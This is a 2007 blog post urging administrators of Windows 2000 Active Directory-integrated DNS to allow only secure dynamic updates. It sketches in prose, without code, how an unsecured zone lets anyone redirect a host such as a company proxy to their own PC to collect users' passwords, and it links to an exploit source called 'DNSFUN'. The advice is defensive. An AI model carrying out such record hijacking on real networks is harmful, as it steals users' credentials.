Saturday, March 24, 2007

If you use Windows 2000 DNS (for Active Directory ..etc) use only Secure Updates

Windows 2000 and later gives you the option to configure your DNS as Active Directory Integrated Zone (ADIZ). This mode is required for name and service automatic update and its super crucial to a successful Active Directory (and some of other MS products like Exchange) implementation.

When enabled in this mode, clients or servers can send an update request DNS packet to the DNS service in Windows and this will be updated inside the DNS service or name records.

However, administrators and implementors, do remember that you should enable secure updates only in the automatic update configuration. Why? Cause otherwise, it's very easy to send a change DNS record update packet and change, for instance, the web address of an internal or external (if you configure split headed dns) host and redirect requests to a malicious site.

An example would be to change proxy.company.com to your PC IP!!!. Users are challenged and they provide user name and password pair. Unknowingly, they have successfully submitted these credentials to your internal password repository. There's only the mind that can limit what other crazy stuff you can do with these type of attack.

So, please enable secure updates only in your DNS automatic update settings.

DNSFUN source: http://securitydot.net/xpl/exploits/vulnerabilities/articles/1578/exploit.html

No comments: